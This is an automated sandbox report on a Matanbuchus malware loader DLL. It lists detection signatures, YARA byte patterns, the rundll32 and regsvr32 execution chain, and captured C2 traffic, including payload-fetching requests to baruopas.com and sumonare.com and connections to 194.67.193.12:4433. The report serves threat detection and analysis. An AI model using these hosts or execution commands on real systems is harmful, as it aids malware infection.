Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
useraccount.aspx.dll

Overview

General Information

Sample name:useraccount.aspx.dll
Analysis ID:1521032
MD5:e6092582959219117440fbdd77d2cc53
SHA1:2722f891bf534e763b5b742b7e5ece905ab35137
SHA256:7f66770624e2d4bd51029a71cf7311cb873ee6fff6a694e4235577d0322a9937
Tags:dllMatanbuchususer-NDA0E
Infos:

Detection

Matanbuchus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
AI detected suspicious sample
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Sigma detected: Potentially Suspicious Malware Callback Communication
Uses known network protocols on non-standard ports
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6500 cmdline: loaddll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6524 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7016 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • MpCmdRun.exe (PID: 7812 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
          • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6768 cmdline: rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInit MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7300 cmdline: rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInitialize MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7356 cmdline: rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7508 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInit MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7516 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInitialize MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7524 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7548 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_setopt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7564 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_perform MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7572 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_init MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7584 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_cleanup MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 612 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7600 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",_Uninitialize MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7632 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",UnregisterDll MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7668 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Uninitialize MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7688 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ThreadFunction MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7708 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7740 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Init MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7756 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ExportDll MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7768 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Export MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7792 cmdline: rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllUninitialize MD5: 889B99C52A60DD49227C5E485A016679)
  • regsvr32.exe (PID: 7880 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 7932 cmdline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 7772 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MatanbuchusAccording to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus
No configs have been found
SourceRuleDescriptionAuthorStrings
useraccount.aspx.dllJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
    useraccount.aspx.dllWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
    • 0x511b0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
    • 0x55d10:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\8f08\user-PC\user-PC.ocxJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
      C:\Users\user\8f08\user-PC\user-PC.ocxWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
      • 0x511b0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
      • 0x1dec5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
      • 0x1f585:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
      0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
      • 0x38160:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
      00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
        00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
        • 0x1f8a5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
        • 0x20f65:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
        00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
        • 0x39b40:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
        Click to see the 16 entries
        SourceRuleDescriptionAuthorStrings
        36.2.regsvr32.exe.7f0b0000.1.raw.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
          36.2.regsvr32.exe.7f0b0000.1.raw.unpackWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
          • 0x1f8a5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
          • 0x20f65:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
          36.2.regsvr32.exe.7f0b0000.1.raw.unpackWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
          • 0x39b40:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
          13.2.rundll32.exe.7ed90000.3.raw.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
            13.2.rundll32.exe.7ed90000.3.raw.unpackWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
            • 0x1f8a5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
            • 0x20f65:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
            Click to see the 25 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 194.67.193.12, DestinationIsIpv6: false, DestinationPort: 4433, EventID: 3, Image: C:\Windows\SysWOW64\rundll32.exe, Initiated: true, ProcessId: 7356, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49710
            Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 194.67.193.12, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 7932, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49704
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-28T03:22:29.055319+020020344681Malware Command and Control Activity Detected192.168.2.749710194.67.193.124433TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: baruopas.comVirustotal: Detection: 5%Perma Link
            Source: sumonare.comVirustotal: Detection: 5%Perma Link
            Source: https://sumonare.com/Virustotal: Detection: 5%Perma Link
            Source: https://sumonare.com/projects/index.aspxVirustotal: Detection: 6%Perma Link
            Source: https://baruopas.com/projects/useraccount.aspxVirustotal: Detection: 5%Perma Link
            Source: C:\Users\user\8f08\user-PC\user-PC.ocxReversingLabs: Detection: 18%
            Source: C:\Users\user\8f08\user-PC\user-PC.ocxVirustotal: Detection: 27%Perma Link
            Source: useraccount.aspx.dllVirustotal: Detection: 27%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: useraccount.aspx.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
            Source: unknownHTTPS traffic detected: 194.67.193.13:443 -> 192.168.2.7:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49770 version: TLS 1.2

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49710 -> 194.67.193.12:4433
            Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 194.67.193.12 443
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.67.193.13 443Jump to behavior
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49821
            Source: global trafficTCP traffic: 192.168.2.7:49710 -> 194.67.193.12:4433
            Source: Joe Sandbox ViewASN Name: IHOR-ASRU IHOR-ASRU
            Source: Joe Sandbox ViewASN Name: IHOR-ASRU IHOR-ASRU
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,13_2_7EDF1D60
            Source: global trafficHTTP traffic detected: GET /projects/useraccount.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: baruopas.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /projects/index.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: sumonare.comCache-Control: no-cache
